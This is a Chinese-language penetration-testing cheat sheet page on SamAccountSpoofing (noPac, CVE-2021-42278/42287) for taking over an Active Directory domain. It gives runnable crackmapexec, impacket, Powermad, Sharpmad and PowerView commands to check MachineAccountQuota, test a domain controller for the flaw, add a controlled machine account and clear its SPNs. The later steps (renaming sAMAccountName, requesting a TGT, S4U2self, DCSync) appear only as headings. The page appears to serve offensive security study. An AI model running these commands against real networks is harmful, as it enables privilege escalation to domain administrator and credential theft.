SamAccountSpoofing

需要MachineAccountQuota > 0

检查账户的MachineAccountQuota

>crackmapexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ
>StandIn.exe --object ms-DS-MachineAccountQuota=*

检查DC是否存在漏洞

>crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac

EXPLOIT

添加计算机账户

impacket@linux> addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'

powermad@windows> . .\Powermad.ps1
powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force
powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose

sharpmad@windows> Sharpmad.exe MAQ -Action new -MachineAccount ControlledComputer -MachinePassword ComputerPassword

清除被控机器账户的servicePrincipalName 属性

impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController

powershell@windows> . .\Powerview.ps1
powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose

(CVE-2021-42278) 将受控机器帐户 sAMAccountName 更改为域控制器的名称,不带尾随 $

为被控机器申请TGT

充值被控账户的sAMAccountName 到旧值

(CVE-2021-42287) 通过出示之前获得的 TGT 向 S4U2self 请求服务票证

DCSync

自动exploit

上一页Runas下一页SeBackupPrivilege

最后更新于

这有帮助吗?